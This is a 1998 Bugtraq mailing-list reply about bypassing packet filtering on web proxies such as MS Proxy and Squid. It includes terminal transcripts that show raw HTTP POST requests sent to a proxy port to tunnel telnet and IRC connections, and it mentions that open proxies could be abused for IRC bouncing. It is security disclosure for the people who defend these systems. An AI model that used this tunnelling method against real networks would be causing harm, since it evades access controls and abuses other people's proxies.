Bugtraq mailing list archives

Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering

From: peter () ATTIC VUURWERK NL (Peter van Dijk)
Date: Tue, 13 Oct 1998 23:08:44 +0200


On Fri, Oct 09, 1998 at 07:46:38AM +0200, Jean-Christophe Touvet wrote:

Date: Thu, 08 Oct 1998 08:27:36 +0100
From:  "Mnemonix" <mnemonix () globalnet co uk>

Firstly it seems that most web-based proxies, not just MS Proxy, are
susceptible to this kind of attack. Thanks to Greg Jones and others for
doing some testing on this.


 HTTP POST is limited: telnet, NetBios etc. will not work, while CONNECT will
pass them straightforward.


Very untrue. Look at this:
[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://telnet:23/ HTTP/1.0


VuurWerk Internet Telnet Server
(telnet.vuurwerk.nl)

Alle transacties worden gelogged, het gebruik
van deze server is alleen voor klanten van
VuurWerk tbv. het onderhoud van hun eigen site.

POST / HTTP/1.0
Via: 1.0 rotterdam.vuurwerk.nl:8080 (Squid/1.1.21)
X-Forwarded-For: 194.178.232.22
Host: telnet.vuurwerk.nl
Cache-control: Max-age=259200

login: hardbeat
Password:
Last login: Tue Oct 13 22:59:49 from rotterdam
  PID TTY STAT TIME COMMAND
 5896  p6 S    0:00 /bin/login -h p8ur.cistron.nl -p
 5901  p6 S    0:00  \_ -bash
 6175  p6 S    0:00      \_ telnet proxy 8080
 6186  p8 S    0:00 /bin/login -h rotterdam vuurwerk.nl -p
 6190  p8 S    0:00  \_ -bash
 6205  p8 R    0:00      \_ ps xfww
[hardbeat@haarlem hardbeat]$


Haarlem is the shellmachine here, also CNAMEd telnet. The proxy (Squid/1.1.21)
will happily forward me, and telnet works as if there's no proxy inbetween.

Another great example:

[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://irc.pi.net:6667/ HTTP/1.0

nick Hardbeat2
PING:1693634679
PONG 1693634679
USER hardbeat haarlem.vuurwerk.nl irc.pi.net :Peter van Dijk (via proxy)
:Antwerpen.Be.Eu.Undernet.org 001 Hardbeat2 :Welcome to the Internet Relay Network Hardbeat2
:Antwerpen.Be.Eu.Undernet.org 002 Hardbeat2 :Your host is Antwerpen.Be.Eu.Undernet.org, running version u2.10.04
:Antwerpen.Be.Eu.Undernet.org 003 Hardbeat2 :This server was created Fri Jun 19 1998 at 18:44:36 MET DST

I can happily IRC now... imagine how easy it would be to write an IRC bouncer
that uses a proxy. Lots of proxies have NO acl or firewall around them.

The only thing I have _not_ succeeded in until now is chaining proxies with
GET or POST requests.

Greetz, Peter.
--
'I guess anybody who walks away from a root shell at :         Peter van Dijk
 a nerd party gets what they deserve!' -- BillSF     :peter () attic vuurwerk nl
-- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --
finger peter () jamaica xs4all nl for my public PGP-key
  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -

Current thread:

By-passing MS Proxy 2.0 and others packet filtering Mnemonix (Oct 08)
- Lotus Domino application vulnerability Weld Pond (Oct 08)
- Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering Jean-Christophe Touvet (Oct 08)
  - Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering Gus (Oct 13)
  - Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering Peter van Dijk (Oct 13)
    - Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering Kevin Way (Oct 14)
    - Secure Locate v1.2 klindsay (Oct 14)
- Re: By-passing MS Proxy 2.0 and others packet filtering Marc D. Behr (Oct 09)
- DoS attack in MS - Proxy 2.0 Mnemonix (Oct 09)